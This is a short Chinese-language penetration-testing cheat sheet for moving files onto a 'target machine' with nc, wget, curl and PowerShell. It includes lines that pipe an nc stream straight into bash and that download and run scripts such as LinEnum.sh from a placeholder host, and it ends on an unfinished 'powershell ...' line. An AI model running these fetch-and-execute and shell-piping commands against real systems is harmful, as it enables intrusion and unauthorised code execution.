# 本地
cat ${file}|nc -lnvp port
# 目标机
nc ip port >> ${file}
# 执行 bash 的话
nc ip port | bash
# 下载文件
wget http://domain/file
# 下载目录下所有文件
wget -r http://domain/dir
# 下载另存为
curl http://domain/file -o file
# 下载并执行 (常用 curl http://domain/LinEnum.sh | bash)
curl http://domain/file.sh | bash
wget -Uri http://domain/file -OutFile file
powershell ...